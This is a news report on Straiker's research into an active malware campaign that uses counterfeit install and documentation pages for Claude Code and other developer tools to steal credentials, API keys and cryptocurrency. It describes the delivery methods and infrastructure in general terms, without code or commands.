Straiker researchers say they have uncovered an active malware operation that uses fake installer and documentation pages for Claude Code and other developer tools to trick users into running malicious code. The campaign, which also imitates JetBrains, NotebookLM, Cline and other AI-related products, is designed to steal browser credentials, API keys, password vault data and cryptocurrency funds.
The company said the campaign has been running since March 2026 and was still active in mid-May, with 32 of 88 tracked domains still serving content at that point. Straiker also found that the operation keeps shifting infrastructure, including new GitHub Pages domains, making takedown efforts harder.
According to Straiker, the attackers appear to be relying on search engine manipulation and paid Google ads to place fake sites in front of developers looking for installation instructions. The lure is especially effective because AI coding tools often require users to copy commands from a web page into a terminal, which can make malicious instructions look routine.
The researchers described the pages as convincing replicas of real product documentation. In one case, the campaign used a domain identified as ravishingtattle[.]com to deliver the malware chain. Straiker said the sites were built to look legitimate enough that a user might not notice anything unusual before pasting a command that launches the infection.
Straiker said the operation is notable because it targets AI-specific assets, including credentials for tools such as Cline and Continue.dev. The company described the campaign as one of the first it has seen built specifically to harvest AI developer credentials rather than only traditional browser data and crypto wallets.
The attackers use several delivery techniques across the campaign. Straiker said one variant hides a malicious command behind a shell operator that can make the payload harder to spot. Other paths include multi-stage PowerShell activity, mshta-based delivery and trojanized installers. One variant reportedly delivers PlugX, while another uses a stealer family that the firm tracks as ACRStealer.
Straiker said the malware stages include anti-analysis checks, in-memory payload loading, and encrypted command-and-control communications. The company also reported that parts of the operation use WebDAV, Telegraph dead drops and Binance Smart Chain smart contracts to route traffic or hide infrastructure. In one case, Straiker said the crypto-clipper component uses a blockchain smart contract for command-and-control, which reduces the usefulness of traditional domain takedowns.
The researchers also described a Rust-compiled clipper that targets more than 20 blockchains. That tool is intended to intercept cryptocurrency transfers and replace destination wallet addresses with attacker-controlled addresses.
Straiker framed the campaign as a warning for developers who increasingly rely on AI coding assistants and related tools. The trust built into those workflows can become a weakness if attackers can persuade users to copy commands from a counterfeit website.
The company said the broader lesson is that AI tool adoption has created a new phishing surface. Developers are not only being asked for browser passwords or cloud logins, but also for API tokens and access to tooling that may connect directly to source code, deployment systems or payment rails.
Straiker published technical indicators and analysis to help defenders spot the campaign. Its findings suggest the operation is both persistent and adaptable, with enough infrastructure still online to continue reaching users even as individual domains are identified.